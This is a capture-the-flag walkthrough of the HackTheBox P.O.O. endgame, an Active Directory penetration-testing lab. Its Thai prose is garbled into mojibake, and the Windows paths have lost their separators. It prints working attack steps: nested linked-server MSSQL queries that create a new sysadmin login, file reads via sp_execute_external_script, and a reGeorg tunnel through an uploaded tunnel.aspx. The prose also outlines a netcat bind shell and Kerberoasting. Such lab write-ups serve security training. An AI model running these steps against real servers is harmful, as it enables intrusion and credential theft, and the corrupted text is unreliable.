āļ„āļ§āļēāļĄāļˆāļĢāļīāļ‡āļāđ‡āļ„āļ·āļ­āđ€āļĄāļ·āđˆāļ­āđ€āļĢāļēāļŠāđˆāļ‡āļ„āļģāļ‚āļ­āđ„āļ›āļĒāļąāļ‡āđ€āļ‹āļīāļĢāđŒāļŸāđ€āļ§āļ­āļĢāđŒāļ—āļĩāđˆāđ€āļŠāļ·āđˆāļ­āļĄāđ‚āļĒāļ‡ āļ„āļģāļ‚āļ­āļ™āļąāđ‰āļ™āļˆāļ°āļ–āļđāļāļ”āļģāđ€āļ™āļīāļ™āļāļēāļĢāđƒāļ™āļšāļĢāļīāļšāļ—āļ‚āļ­āļ‡āļœāļđāđ‰āđƒāļŠāđ‰āļĢāļēāļĒāļ­āļ·āđˆāļ™! āļĄāļēāļ”āļđāļāļąāļ™āļ§āđˆāļēāđ€āļĢāļēāļāļģāļĨāļąāļ‡āđ€āļĢāļĩāļĒāļāđƒāļŠāđ‰āļšāļĢāļīāļšāļ—āļœāļđāđ‰āđƒāļŠāđ‰āđƒāļ”āļšāļ™āđ€āļ‹āļīāļĢāđŒāļŸāđ€āļ§āļ­āļĢāđŒāļ—āļĩāđˆāđ€āļŠāļ·āđˆāļ­āļĄāđ‚āļĒāļ‡

SELECT name FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT user_name() as name');

HackTheBoxendāđ€āļāļĄ āļ—āļēāļ‡āđ€āļ”āļīāļ™āļ‚āļ­āļ‡āļŦāđ‰āļ­āļ‡āļ›āļāļīāļšāļąāļ•āļīāļāļēāļĢāļ›āļāļīāļšāļąāļ•āļīāļāļēāļĢāļĢāļļāļāļ­āļĒāđˆāļēāļ‡āļĄāļ·āļ­āļ­āļēāļŠāļĩāļž Pentest Active Directory

āđāļĨāļ°āļ•āļ­āļ™āļ™āļĩāđ‰āđ€āļĢāļēāļĄāļēāļ”āļđāļāļąāļ™āļ§āđˆāļēāļ„āļģāļ‚āļ­āļˆāļēāļāđ€āļ‹āļīāļĢāđŒāļŸāđ€āļ§āļ­āļĢāđŒāļ—āļĩāđˆāđ€āļŠāļ·āđˆāļ­āļĄāđ‚āļĒāļ‡āđ„āļ›āļĒāļąāļ‡āļ‚āļ­āļ‡āđ€āļĢāļēāļ™āļąāđ‰āļ™āļ–āļđāļāļ”āļģāđ€āļ™āļīāļ™āļāļēāļĢāđƒāļ™āļšāļĢāļīāļšāļ—āđƒāļ”!

SELECT * FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT name FROM openquery("COMPATIBILITYPOO_PUBLIC", ''SELECT user_name() as name'');');

HackTheBoxendāđ€āļāļĄ āļ—āļēāļ‡āđ€āļ”āļīāļ™āļ‚āļ­āļ‡āļŦāđ‰āļ­āļ‡āļ›āļāļīāļšāļąāļ•āļīāļāļēāļĢāļ›āļāļīāļšāļąāļ•āļīāļāļēāļĢāļĢāļļāļāļ­āļĒāđˆāļēāļ‡āļĄāļ·āļ­āļ­āļēāļŠāļĩāļž Pentest Active Directory

āļ”āļąāļ‡āļ™āļąāđ‰āļ™āļˆāļķāļ‡āđ€āļ›āđ‡āļ™āļšāļĢāļīāļšāļ— DBO āļ—āļĩāđˆāļ•āđ‰āļ­āļ‡āļĄāļĩāļŠāļīāļ—āļ˜āļīāđŒāļ—āļąāđ‰āļ‡āļŦāļĄāļ” āļ•āļĢāļ§āļˆāļŠāļ­āļšāļŠāļīāļ—āļ˜āļīāđŒāđƒāļ™āļāļĢāļ“āļĩāļ—āļĩāđˆāļĄāļĩāļāļēāļĢāļĢāđ‰āļ­āļ‡āļ‚āļ­āļˆāļēāļāđ€āļ‹āļīāļĢāđŒāļŸāđ€āļ§āļ­āļĢāđŒāļ—āļĩāđˆāđ€āļŠāļ·āđˆāļ­āļĄāđ‚āļĒāļ‡

SELECT * FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT * FROM openquery("COMPATIBILITYPOO_PUBLIC", ''SELECT is_srvrolemember(''''sysadmin''''), is_srvrolemember(''''dbcreator''''), is_srvrolemember(''''bulkadmin''''), is_srvrolemember(''''diskadmin''''), is_srvrolemember(''''processadmin''''), is_srvrolemember(''''serveradmin''''), is_srvrolemember(''''setupadmin''''), is_srvrolemember(''''securityadmin'''')'')');

HackTheBoxendāđ€āļāļĄ āļ—āļēāļ‡āđ€āļ”āļīāļ™āļ‚āļ­āļ‡āļŦāđ‰āļ­āļ‡āļ›āļāļīāļšāļąāļ•āļīāļāļēāļĢāļ›āļāļīāļšāļąāļ•āļīāļāļēāļĢāļĢāļļāļāļ­āļĒāđˆāļēāļ‡āļĄāļ·āļ­āļ­āļēāļŠāļĩāļž Pentest Active Directory

āļ­āļĒāđˆāļēāļ‡āļ—āļĩāđˆāļ„āļļāļ“āđ€āļŦāđ‡āļ™ āđ€āļĢāļēāļĄāļĩāļŠāļīāļ—āļ˜āļīāđŒāļ—āļąāđ‰āļ‡āļŦāļĄāļ”! āļĄāļēāļŠāļĢāđ‰āļēāļ‡āļœāļđāđ‰āļ”āļđāđāļĨāļĢāļ°āļšāļšāļ‚āļ­āļ‡āđ€āļĢāļēāđāļšāļšāļ™āļĩāđ‰ āđāļ•āđˆāļžāļ§āļāđ€āļ‚āļēāđ„āļĄāđˆāđƒāļŦāđ‰āļœāđˆāļēāļ™ openquery āļĄāļēāļ—āļģāļœāđˆāļēāļ™ EXECUTE AT āļāļąāļ™āđ€āļ–āļ­āļ°

EXECUTE('EXECUTE(''CREATE LOGIN [ralf] WITH PASSWORD=N''''ralfralf'''', DEFAULT_DATABASE=[master], CHECK_EXPIRATION=OFF, CHECK_POLICY=OFF'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
EXECUTE('EXECUTE(''CREATE USER [ralf] FOR LOGIN [ralf]'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
EXECUTE('EXECUTE(''ALTER SERVER ROLE [sysadmin] ADD MEMBER [ralf]'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
EXECUTE('EXECUTE(''ALTER ROLE [db_owner] ADD MEMBER [ralf]'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";

āđāļĨāļ°āļ•āļ­āļ™āļ™āļĩāđ‰āđ€āļĢāļēāđ€āļŠāļ·āđˆāļ­āļĄāļ•āđˆāļ­āļāļąāļšāļ‚āđ‰āļ­āļĄāļđāļĨāļĢāļąāļšāļĢāļ­āļ‡āļ‚āļ­āļ‡āļœāļđāđ‰āđƒāļŠāđ‰āđƒāļŦāļĄāđˆ āļŠāļąāļ‡āđ€āļāļ•āļāļēāļ™āļ‚āđ‰āļ­āļĄāļđāļĨāđāļŸāļĨāđ‡āļāđƒāļŦāļĄāđˆ

HackTheBoxendāđ€āļāļĄ āļ—āļēāļ‡āđ€āļ”āļīāļ™āļ‚āļ­āļ‡āļŦāđ‰āļ­āļ‡āļ›āļāļīāļšāļąāļ•āļīāļāļēāļĢāļ›āļāļīāļšāļąāļ•āļīāļāļēāļĢāļĢāļļāļāļ­āļĒāđˆāļēāļ‡āļĄāļ·āļ­āļ­āļēāļŠāļĩāļž Pentest Active Directory

āđ€āļĢāļēāļĄāļ­āļšāļ˜āļ‡āļ™āļĩāđ‰āđāļĨāļ°āļāđ‰āļēāļ§āļ•āđˆāļ­āđ„āļ›

HackTheBoxendāđ€āļāļĄ āļ—āļēāļ‡āđ€āļ”āļīāļ™āļ‚āļ­āļ‡āļŦāđ‰āļ­āļ‡āļ›āļāļīāļšāļąāļ•āļīāļāļēāļĢāļ›āļāļīāļšāļąāļ•āļīāļāļēāļĢāļĢāļļāļāļ­āļĒāđˆāļēāļ‡āļĄāļ·āļ­āļ­āļēāļŠāļĩāļž Pentest Active Directory

āļ˜āļ‡āļ–āļ­āļĒāļŦāļĨāļąāļ‡

āļĄāļēāļĢāļąāļšāđ€āļŠāļĨāļĨāđŒāđ‚āļ”āļĒāđƒāļŠāđ‰ MSSQL āļ‰āļąāļ™āđƒāļŠāđ‰ mssqlclient āļˆāļēāļāđāļžāđ‡āļ„āđ€āļāļˆ Impactet

mssqlclient.py ralf:ralfralf@poo.htb -db POO_PUBLIC

HackTheBoxendāđ€āļāļĄ āļ—āļēāļ‡āđ€āļ”āļīāļ™āļ‚āļ­āļ‡āļŦāđ‰āļ­āļ‡āļ›āļāļīāļšāļąāļ•āļīāļāļēāļĢāļ›āļāļīāļšāļąāļ•āļīāļāļēāļĢāļĢāļļāļāļ­āļĒāđˆāļēāļ‡āļĄāļ·āļ­āļ­āļēāļŠāļĩāļž Pentest Active Directory

āđ€āļĢāļēāļ•āđ‰āļ­āļ‡āđ„āļ”āđ‰āļĢāļąāļšāļĢāļŦāļąāļŠāļœāđˆāļēāļ™āđāļĨāļ°āļŠāļīāđˆāļ‡āđāļĢāļāļ—āļĩāđˆāđ€āļĢāļēāļžāļšāđāļĨāđ‰āļ§āļ„āļ·āļ­āđ„āļ‹āļ•āđŒ āļ”āļąāļ‡āļ™āļąāđ‰āļ™āđ€āļĢāļēāļˆāļķāļ‡āļ•āđ‰āļ­āļ‡āļāļēāļĢāļāļēāļĢāļāļģāļŦāļ™āļ”āļ„āđˆāļēāđ€āļ§āđ‡āļšāđ€āļ‹āļīāļĢāđŒāļŸāđ€āļ§āļ­āļĢāđŒ (āđ€āļ›āđ‡āļ™āđ„āļ›āđ„āļĄāđˆāđ„āļ”āđ‰āļ—āļĩāđˆāļˆāļ°āđ‚āļĒāļ™āđ€āļŠāļĨāļĨāđŒāļ—āļĩāđˆāļŠāļ°āļ”āļ§āļ āđ€āļŦāđ‡āļ™āđ„āļ”āđ‰āļŠāļąāļ”āļ§āđˆāļēāđ„āļŸāļĢāđŒāļ§āļ­āļĨāļĨāđŒāļāļģāļĨāļąāļ‡āļ—āļģāļ‡āļēāļ™āļ­āļĒāļđāđˆ)

HackTheBoxendāđ€āļāļĄ āļ—āļēāļ‡āđ€āļ”āļīāļ™āļ‚āļ­āļ‡āļŦāđ‰āļ­āļ‡āļ›āļāļīāļšāļąāļ•āļīāļāļēāļĢāļ›āļāļīāļšāļąāļ•āļīāļāļēāļĢāļĢāļļāļāļ­āļĒāđˆāļēāļ‡āļĄāļ·āļ­āļ­āļēāļŠāļĩāļž Pentest Active Directory

āđāļ•āđˆāļāļēāļĢāđ€āļ‚āđ‰āļēāļ–āļķāļ‡āļ–āļđāļāļ›āļāļīāđ€āļŠāļ˜ āđāļĄāđ‰āļ§āđˆāļēāđ€āļĢāļēāļˆāļ°āļŠāļēāļĄāļēāļĢāļ–āļ­āđˆāļēāļ™āđ„āļŸāļĨāđŒāļˆāļēāļ MSSQL āđ„āļ”āđ‰ āđāļ•āđˆāđ€āļĢāļēāļāđ‡āļ•āđ‰āļ­āļ‡āļĢāļđāđ‰āļ§āđˆāļēāļĄāļĩāļāļēāļĢāļāļģāļŦāļ™āļ”āļ„āđˆāļēāļ āļēāļĐāļēāđ‚āļ›āļĢāđāļāļĢāļĄāļ­āļ°āđ„āļĢ āđāļĨāļ°āđƒāļ™āđ„āļ”āđ€āļĢāđ‡āļāļ—āļ­āļĢāļĩ MSSQL āđ€āļĢāļēāļžāļšāļ§āđˆāļēāļĄāļĩ Python

HackTheBoxendāđ€āļāļĄ āļ—āļēāļ‡āđ€āļ”āļīāļ™āļ‚āļ­āļ‡āļŦāđ‰āļ­āļ‡āļ›āļāļīāļšāļąāļ•āļīāļāļēāļĢāļ›āļāļīāļšāļąāļ•āļīāļāļēāļĢāļĢāļļāļāļ­āļĒāđˆāļēāļ‡āļĄāļ·āļ­āļ­āļēāļŠāļĩāļž Pentest Active Directory

āļˆāļēāļāļ™āļąāđ‰āļ™āđ„āļĄāđˆāļĄāļĩāļ›āļąāļāļŦāļēāđƒāļ™āļāļēāļĢāļ­āđˆāļēāļ™āđ„āļŸāļĨāđŒ web.config

EXEC sp_execute_external_script
@language = N'Python',
@script = "print(open('C:inetpubwwwrootweb.config').read())"

HackTheBoxendāđ€āļāļĄ āļ—āļēāļ‡āđ€āļ”āļīāļ™āļ‚āļ­āļ‡āļŦāđ‰āļ­āļ‡āļ›āļāļīāļšāļąāļ•āļīāļāļēāļĢāļ›āļāļīāļšāļąāļ•āļīāļāļēāļĢāļĢāļļāļāļ­āļĒāđˆāļēāļ‡āļĄāļ·āļ­āļ­āļēāļŠāļĩāļž Pentest Active Directory

āđ€āļĄāļ·āđˆāļ­āļžāļšāļ‚āđ‰āļ­āļĄāļđāļĨāļĢāļąāļšāļĢāļ­āļ‡āđāļĨāđ‰āļ§ āđƒāļŦāđ‰āđ„āļ›āļ—āļĩāđˆ /admin āđāļĨāļ°āļĢāļąāļšāļ˜āļ‡

HackTheBoxendāđ€āļāļĄ āļ—āļēāļ‡āđ€āļ”āļīāļ™āļ‚āļ­āļ‡āļŦāđ‰āļ­āļ‡āļ›āļāļīāļšāļąāļ•āļīāļāļēāļĢāļ›āļāļīāļšāļąāļ•āļīāļāļēāļĢāļĢāļļāļāļ­āļĒāđˆāļēāļ‡āļĄāļ·āļ­āļ­āļēāļŠāļĩāļž Pentest Active Directory

HackTheBoxendāđ€āļāļĄ āļ—āļēāļ‡āđ€āļ”āļīāļ™āļ‚āļ­āļ‡āļŦāđ‰āļ­āļ‡āļ›āļāļīāļšāļąāļ•āļīāļāļēāļĢāļ›āļāļīāļšāļąāļ•āļīāļāļēāļĢāļĢāļļāļāļ­āļĒāđˆāļēāļ‡āļĄāļ·āļ­āļ­āļēāļŠāļĩāļž Pentest Active Directory

āļ•āļąāđ‰āļ‡āļŦāļĨāļąāļāļ›āļąāļāļ˜āļ‡

āđƒāļ™āļ„āļ§āļēāļĄāđ€āļ›āđ‡āļ™āļˆāļĢāļīāļ‡ āļĄāļĩāļ„āļ§āļēāļĄāđ„āļĄāđˆāļŠāļ°āļ”āļ§āļāļšāļēāļ‡āļ›āļĢāļ°āļāļēāļĢāļˆāļēāļāļāļēāļĢāđƒāļŠāđ‰āđ„āļŸāļĢāđŒāļ§āļ­āļĨāļĨāđŒ āđāļ•āđˆāđ€āļĄāļ·āđˆāļ­āļ”āļđāļœāđˆāļēāļ™āļāļēāļĢāļ•āļąāđ‰āļ‡āļ„āđˆāļēāđ€āļ„āļĢāļ·āļ­āļ‚āđˆāļēāļĒ āđ€āļĢāļēāļŠāļąāļ‡āđ€āļāļ•āđ€āļŦāđ‡āļ™āļ§āđˆāļēāļĄāļĩāļāļēāļĢāđƒāļŠāđ‰āđ‚āļ›āļĢāđ‚āļ•āļ„āļ­āļĨ IPv6 āļ”āđ‰āļ§āļĒ!

HackTheBoxendāđ€āļāļĄ āļ—āļēāļ‡āđ€āļ”āļīāļ™āļ‚āļ­āļ‡āļŦāđ‰āļ­āļ‡āļ›āļāļīāļšāļąāļ•āļīāļāļēāļĢāļ›āļāļīāļšāļąāļ•āļīāļāļēāļĢāļĢāļļāļāļ­āļĒāđˆāļēāļ‡āļĄāļ·āļ­āļ­āļēāļŠāļĩāļž Pentest Active Directory

āđ€āļžāļīāđˆāļĄāļ—āļĩāđˆāļ­āļĒāļđāđˆāļ™āļĩāđ‰āđƒāļ™ /etc/hosts
dead:babe::1001 poo6.htb
āļĨāļ­āļ‡āļŠāđāļāļ™āđ‚āļŪāļŠāļ•āđŒāļ­āļĩāļāļ„āļĢāļąāđ‰āļ‡ āđāļ•āđˆāļ„āļĢāļēāļ§āļ™āļĩāđ‰āļœāđˆāļēāļ™ IPv6

HackTheBoxendāđ€āļāļĄ āļ—āļēāļ‡āđ€āļ”āļīāļ™āļ‚āļ­āļ‡āļŦāđ‰āļ­āļ‡āļ›āļāļīāļšāļąāļ•āļīāļāļēāļĢāļ›āļāļīāļšāļąāļ•āļīāļāļēāļĢāļĢāļļāļāļ­āļĒāđˆāļēāļ‡āļĄāļ·āļ­āļ­āļēāļŠāļĩāļž Pentest Active Directory

āđāļĨāļ°āļšāļĢāļīāļāļēāļĢ WinRM āļžāļĢāđ‰āļ­āļĄāđƒāļŠāđ‰āļ‡āļēāļ™āļšāļ™ IPv6 āļĄāļēāđ€āļŠāļ·āđˆāļ­āļĄāļ•āđˆāļ­āļāļąāļšāļ‚āđ‰āļ­āļĄāļđāļĨāļĢāļąāļšāļĢāļ­āļ‡āļ—āļĩāđˆāļžāļš

HackTheBoxendāđ€āļāļĄ āļ—āļēāļ‡āđ€āļ”āļīāļ™āļ‚āļ­āļ‡āļŦāđ‰āļ­āļ‡āļ›āļāļīāļšāļąāļ•āļīāļāļēāļĢāļ›āļāļīāļšāļąāļ•āļīāļāļēāļĢāļĢāļļāļāļ­āļĒāđˆāļēāļ‡āļĄāļ·āļ­āļ­āļēāļŠāļĩāļž Pentest Active Directory

āļĄāļĩāļ˜āļ‡āļ­āļĒāļđāđˆāļšāļ™āđ‚āļ•āđŠāļ° āļĄāļ­āļšāđƒāļŦāđ‰

HackTheBoxendāđ€āļāļĄ āļ—āļēāļ‡āđ€āļ”āļīāļ™āļ‚āļ­āļ‡āļŦāđ‰āļ­āļ‡āļ›āļāļīāļšāļąāļ•āļīāļāļēāļĢāļ›āļāļīāļšāļąāļ•āļīāļāļēāļĢāļĢāļļāļāļ­āļĒāđˆāļēāļ‡āļĄāļ·āļ­āļ­āļēāļŠāļĩāļž Pentest Active Directory

P00ned āđāļŸāļĨāđ‡āļ

āļŦāļĨāļąāļ‡āļˆāļēāļāļ•āļĢāļ°āđ€āļ§āļ™āļ­āļĒāļđāđˆāļāļąāļšāđ€āļˆāđ‰āļēāļšāđ‰āļēāļ™ āļ–āļąāđˆāļ§āļ§āļīāļ™āļžāļĩ āđ€āļĢāļēāđ„āļĄāđˆāļžāļšāļ­āļ°āđ„āļĢāļžāļīāđ€āļĻāļĐ āļˆāļēāļāļ™āļąāđ‰āļ™āļˆāļķāļ‡āļ•āļąāļ”āļŠāļīāļ™āđƒāļˆāļ„āđ‰āļ™āļŦāļēāļ‚āđ‰āļ­āļĄāļđāļĨāļ›āļĢāļ°āļˆāļģāļ•āļąāļ§āļ­āļĩāļāļ„āļĢāļąāđ‰āļ‡ (āļ‰āļąāļ™āđ€āļ‚āļĩāļĒāļ™āđƒāļ™āļŦāļąāļ§āļ‚āđ‰āļ­āļ™āļĩāđ‰āļ”āđ‰āļ§āļĒ āļšāļ—āļ„āļ§āļēāļĄ). āđāļ•āđˆāļ‰āļąāļ™āđ„āļĄāđˆāļŠāļēāļĄāļēāļĢāļ–āļĢāļąāļš SPN āļ—āļąāđ‰āļ‡āļŦāļĄāļ”āļˆāļēāļāļĢāļ°āļšāļšāļœāđˆāļēāļ™ WinRM

setspn.exe -T intranet.poo -Q */*

HackTheBoxendāđ€āļāļĄ āļ—āļēāļ‡āđ€āļ”āļīāļ™āļ‚āļ­āļ‡āļŦāđ‰āļ­āļ‡āļ›āļāļīāļšāļąāļ•āļīāļāļēāļĢāļ›āļāļīāļšāļąāļ•āļīāļāļēāļĢāļĢāļļāļāļ­āļĒāđˆāļēāļ‡āļĄāļ·āļ­āļ­āļēāļŠāļĩāļž Pentest Active Directory

āļĨāļ­āļ‡āļĢāļąāļ™āļ„āļģāļŠāļąāđˆāļ‡āļœāđˆāļēāļ™ MSSQL

HackTheBoxendāđ€āļāļĄ āļ—āļēāļ‡āđ€āļ”āļīāļ™āļ‚āļ­āļ‡āļŦāđ‰āļ­āļ‡āļ›āļāļīāļšāļąāļ•āļīāļāļēāļĢāļ›āļāļīāļšāļąāļ•āļīāļāļēāļĢāļĢāļļāļāļ­āļĒāđˆāļēāļ‡āļĄāļ·āļ­āļ­āļēāļŠāļĩāļž Pentest Active Directory

āļ”āđ‰āļ§āļĒāļ§āļīāļ˜āļĩāļ™āļĩāđ‰ āđ€āļĢāļēāđ„āļ”āđ‰āļĢāļąāļš SPN āļ‚āļ­āļ‡āļœāļđāđ‰āđƒāļŠāđ‰ p00_hr āđāļĨāļ° p00_adm āļ‹āļķāđˆāļ‡āļŦāļĄāļēāļĒāļ„āļ§āļēāļĄāļ§āđˆāļēāļžāļ§āļāđ€āļ‚āļēāđ€āļŠāļĩāđˆāļĒāļ‡āļ•āđˆāļ­āļāļēāļĢāļ–āļđāļāđ‚āļˆāļĄāļ•āļĩ āđ€āļŠāđˆāļ™ Kerberoasting āđƒāļ™āļĢāļ°āļĒāļ°āļŠāļąāđ‰āļ™ āđ€āļĢāļēāļŠāļēāļĄāļēāļĢāļ–āļĢāļąāļšāđāļŪāļŠāļ‚āļ­āļ‡āļĢāļŦāļąāļŠāļœāđˆāļēāļ™āđ„āļ”āđ‰

āļāđˆāļ­āļ™āļ­āļ·āđˆāļ™āļ„āļļāļ“āļ•āđ‰āļ­āļ‡āđ„āļ”āđ‰āļĢāļąāļšāđ€āļŠāļĨāļĨāđŒāļ—āļĩāđˆāđ€āļŠāļ–āļĩāļĒāļĢāđƒāļ™āļ™āļēāļĄāļ‚āļ­āļ‡āļœāļđāđ‰āđƒāļŠāđ‰ MSSQL āđāļ•āđˆāđ€āļ™āļ·āđˆāļ­āļ‡āļˆāļēāļāđ€āļĢāļēāđ€āļ‚āđ‰āļēāļ–āļķāļ‡āđ„āļ”āđ‰āļˆāļģāļāļąāļ” āđ€āļĢāļēāļˆāļķāļ‡āđ€āļŠāļ·āđˆāļ­āļĄāļ•āđˆāļ­āļāļąāļšāđ‚āļŪāļŠāļ•āđŒāļœāđˆāļēāļ™āļžāļ­āļĢāđŒāļ• 80 āđāļĨāļ° 1433 āđ€āļ—āđˆāļēāļ™āļąāđ‰āļ™ āđāļ•āđˆāļŠāļēāļĄāļēāļĢāļ–āļ‚āļļāļ”āļ­āļļāđ‚āļĄāļ‡āļ„āđŒāļœāđˆāļēāļ™āļžāļ­āļĢāđŒāļ• 80 āđ„āļ”āđ‰! āļŠāļģāļŦāļĢāļąāļšāļŠāļīāđˆāļ‡āļ™āļĩāđ‰āđ€āļĢāļēāļˆāļ°āđƒāļŠāđ‰ āļāļēāļĢāļŠāļĄāļąāļ„āļĢāļ„āļĢāļąāđ‰āļ‡āļ•āđˆāļ­āđ„āļ›. āļĄāļēāļ­āļąāļ›āđ‚āļŦāļĨāļ”āđ„āļŸāļĨāđŒ tunnel.aspx āđ„āļ›āļĒāļąāļ‡āđ‚āļŪāļĄāđ„āļ”āđ€āļĢāđ‡āļāļ—āļ­āļĢāļĩāļ‚āļ­āļ‡āđ€āļ§āđ‡āļšāđ€āļ‹āļīāļĢāđŒāļŸāđ€āļ§āļ­āļĢāđŒ - C: inetpubwwwroot

HackTheBoxendāđ€āļāļĄ āļ—āļēāļ‡āđ€āļ”āļīāļ™āļ‚āļ­āļ‡āļŦāđ‰āļ­āļ‡āļ›āļāļīāļšāļąāļ•āļīāļāļēāļĢāļ›āļāļīāļšāļąāļ•āļīāļāļēāļĢāļĢāļļāļāļ­āļĒāđˆāļēāļ‡āļĄāļ·āļ­āļ­āļēāļŠāļĩāļž Pentest Active Directory

āđāļ•āđˆāđ€āļĄāļ·āđˆāļ­āđ€āļĢāļēāļžāļĒāļēāļĒāļēāļĄāđ€āļ‚āđ‰āļēāļ–āļķāļ‡āđ€āļĢāļēāđ„āļ”āđ‰āļĢāļąāļšāļ‚āđ‰āļ­āļœāļīāļ”āļžāļĨāļēāļ” 404 āļ‹āļķāđˆāļ‡āļŦāļĄāļēāļĒāļ„āļ§āļēāļĄāļ§āđˆāļēāđ„āļŸāļĨāđŒ *.aspx āļˆāļ°āđ„āļĄāđˆāļ–āļđāļāđ€āļĢāļĩāļĒāļāđƒāļŠāđ‰āļ‡āļēāļ™ āļŦāļēāļāļ•āđ‰āļ­āļ‡āļāļēāļĢāđ€āļĢāļĩāļĒāļāđƒāļŠāđ‰āđ„āļŸāļĨāđŒāļ—āļĩāđˆāļĄāļĩāļ™āļēāļĄāļŠāļāļļāļĨāđ€āļŦāļĨāđˆāļēāļ™āļĩāđ‰ āđƒāļŦāđ‰āļ•āļīāļ”āļ•āļąāđ‰āļ‡ ASP.NET 4.5 āļ”āļąāļ‡āļ™āļĩāđ‰

dism /online /enable-feature /all /featurename:IIS-ASPNET45

HackTheBoxendāđ€āļāļĄ āļ—āļēāļ‡āđ€āļ”āļīāļ™āļ‚āļ­āļ‡āļŦāđ‰āļ­āļ‡āļ›āļāļīāļšāļąāļ•āļīāļāļēāļĢāļ›āļāļīāļšāļąāļ•āļīāļāļēāļĢāļĢāļļāļāļ­āļĒāđˆāļēāļ‡āļĄāļ·āļ­āļ­āļēāļŠāļĩāļž Pentest Active Directory

HackTheBoxendāđ€āļāļĄ āļ—āļēāļ‡āđ€āļ”āļīāļ™āļ‚āļ­āļ‡āļŦāđ‰āļ­āļ‡āļ›āļāļīāļšāļąāļ•āļīāļāļēāļĢāļ›āļāļīāļšāļąāļ•āļīāļāļēāļĢāļĢāļļāļāļ­āļĒāđˆāļēāļ‡āļĄāļ·āļ­āļ­āļēāļŠāļĩāļž Pentest Active Directory

āđāļĨāļ°āļ•āļ­āļ™āļ™āļĩāđ‰āđ€āļĄāļ·āđˆāļ­āđ€āļ‚āđ‰āļēāđ„āļ›āļ—āļĩāđˆ tunnel.aspx āđ€āļĢāļēāļāđ‡āđ„āļ”āđ‰āļ„āļģāļ•āļ­āļšāļ§āđˆāļēāļ—āļļāļāļ­āļĒāđˆāļēāļ‡āļžāļĢāđ‰āļ­āļĄāđāļĨāđ‰āļ§

HackTheBoxendāđ€āļāļĄ āļ—āļēāļ‡āđ€āļ”āļīāļ™āļ‚āļ­āļ‡āļŦāđ‰āļ­āļ‡āļ›āļāļīāļšāļąāļ•āļīāļāļēāļĢāļ›āļāļīāļšāļąāļ•āļīāļāļēāļĢāļĢāļļāļāļ­āļĒāđˆāļēāļ‡āļĄāļ·āļ­āļ­āļēāļŠāļĩāļž Pentest Active Directory

āđ€āļĢāļēāļĄāļēāđ€āļĢāļīāđˆāļĄāļŠāđˆāļ§āļ™āđ„āļ„āļĨāđ€āļ­āļ™āļ•āđŒāļ‚āļ­āļ‡āđāļ­āļ›āļžāļĨāļīāđ€āļ„āļŠāļąāļ™āļ‹āļķāđˆāļ‡āļˆāļ°āļŠāđˆāļ‡āļ•āđˆāļ­āļ—āļĢāļēāļŸāļŸāļīāļ āđ€āļĢāļēāļˆāļ°āļŠāđˆāļ‡āļ•āđˆāļ­āļāļēāļĢāļĢāļąāļšāļŠāđˆāļ‡āļ‚āđ‰āļ­āļĄāļđāļĨāļ—āļąāđ‰āļ‡āļŦāļĄāļ”āļˆāļēāļāļžāļ­āļĢāđŒāļ• 5432 āđ„āļ›āļĒāļąāļ‡āđ€āļ‹āļīāļĢāđŒāļŸāđ€āļ§āļ­āļĢāđŒ

python ./reGeorgSocksProxy.py -p 5432 -u http://poo.htb/tunnel.aspx

HackTheBoxendāđ€āļāļĄ āļ—āļēāļ‡āđ€āļ”āļīāļ™āļ‚āļ­āļ‡āļŦāđ‰āļ­āļ‡āļ›āļāļīāļšāļąāļ•āļīāļāļēāļĢāļ›āļāļīāļšāļąāļ•āļīāļāļēāļĢāļĢāļļāļāļ­āļĒāđˆāļēāļ‡āļĄāļ·āļ­āļ­āļēāļŠāļĩāļž Pentest Active Directory

āđāļĨāļ°āđ€āļĢāļēāđƒāļŠāđ‰āļžāļĢāđ‡āļ­āļāļ‹āļĩāđ€āļŠāļ™āđ€āļžāļ·āđˆāļ­āļŠāđˆāļ‡āļ—āļĢāļēāļŸāļŸāļīāļāļ‚āļ­āļ‡āđāļ­āļ›āļžāļĨāļīāđ€āļ„āļŠāļąāļ™āđƒāļ”āđ† āļœāđˆāļēāļ™āļžāļĢāđ‡āļ­āļāļ‹āļĩāļ‚āļ­āļ‡āđ€āļĢāļē āļĄāļēāđ€āļžāļīāđˆāļĄāļžāļĢāđ‡āļ­āļāļ‹āļĩāļ™āļĩāđ‰āđƒāļ™āđ„āļŸāļĨāđŒāļ„āļ­āļ™āļŸāļīāļāļđāđ€āļĢāļŠāļąāļ™ /etc/proxychains.conf

HackTheBoxendāđ€āļāļĄ āļ—āļēāļ‡āđ€āļ”āļīāļ™āļ‚āļ­āļ‡āļŦāđ‰āļ­āļ‡āļ›āļāļīāļšāļąāļ•āļīāļāļēāļĢāļ›āļāļīāļšāļąāļ•āļīāļāļēāļĢāļĢāļļāļāļ­āļĒāđˆāļēāļ‡āļĄāļ·āļ­āļ­āļēāļŠāļĩāļž Pentest Active Directory

āļ•āļ­āļ™āļ™āļĩāđ‰āđ€āļĢāļēāļĄāļēāļ­āļąāļ›āđ‚āļŦāļĨāļ”āđ‚āļ›āļĢāđāļāļĢāļĄāđ„āļ›āļĒāļąāļ‡āđ€āļ‹āļīāļĢāđŒāļŸāđ€āļ§āļ­āļĢāđŒ netcatāļ‹āļķāđˆāļ‡āđ€āļĢāļēāļˆāļ°āļŠāļĢāđ‰āļēāļ‡āļāļēāļĢāļœāļđāļāđ€āļŠāļĨāļĨāđŒāļ—āļĩāđˆāđ€āļŠāļ–āļĩāļĒāļĢāđāļĨāļ°āļŠāļ„āļĢāļīāļ›āļ•āđŒ āđ€āļĢāļĩāļĒāļāđƒāļŠāđ‰ Kerberoastāļ‹āļķāđˆāļ‡āđ€āļĢāļēāļˆāļ°āļ—āļģāļāļēāļĢāđ‚āļˆāļĄāļ•āļĩ Kerberoasting

HackTheBoxendāđ€āļāļĄ āļ—āļēāļ‡āđ€āļ”āļīāļ™āļ‚āļ­āļ‡āļŦāđ‰āļ­āļ‡āļ›āļāļīāļšāļąāļ•āļīāļāļēāļĢāļ›āļāļīāļšāļąāļ•āļīāļāļēāļĢāļĢāļļāļāļ­āļĒāđˆāļēāļ‡āļĄāļ·āļ­āļ­āļēāļŠāļĩāļž Pentest Active Directory

